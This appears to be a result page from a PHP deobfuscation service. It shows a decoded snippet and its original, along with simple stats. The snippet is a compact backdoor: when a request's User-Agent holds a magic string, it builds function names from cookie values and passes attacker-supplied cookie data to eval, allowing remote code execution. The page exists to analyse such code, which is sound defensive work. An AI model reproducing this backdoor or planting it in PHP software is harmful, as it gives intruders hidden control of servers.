Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if(isset($_SERVER['HTTP_USER_AGENT'])) { if(strpos($_SERVER['HTTP_USER_AGENT'], '..

Decoded Output download

<?php 
if(isset($_SERVER['HTTP_USER_AGENT'])) { 
	if(strpos($_SERVER['HTTP_USER_AGENT'], '66800722') !== false) { 
		function clnt() { 
	$b = $_COOKIE; 
	($b && isset($b[61])) ? (($gg = $b[61].$b[34]) && ($mn = $gg($b[36].$b[89])) && ($_mn = $gg($b[32].$b[54])) && ($_mn = $_mn($gg($b[64]))) && @eval($_mn)) : $b; 
	 
	return 0; 
} 
 
clnt(); 
	} 
} /* dB5mWp */ ?>

Did this file decode correctly?

Original Code

<?php
if(isset($_SERVER['HTTP_USER_AGENT'])) {
	if(strpos($_SERVER['HTTP_USER_AGENT'], '66800722') !== false) {
		function clnt() {
	$b = $_COOKIE;
	($b && isset($b[61])) ? (($gg = $b[61].$b[34]) && ($mn = $gg($b[36].$b[89])) && ($_mn = $gg($b[32].$b[54])) && ($_mn = $_mn($gg($b[64]))) && @eval($_mn)) : $b;
	
	return 0;
}

clnt();
	}
} /* dB5mWp */

Function Calls

clnt 1
strpos 1

Variables

$b 0

Stats

MD5 a8e71b23ed441312d332b5cd2a6738f8
Eval Count 0
Decode Time 273 ms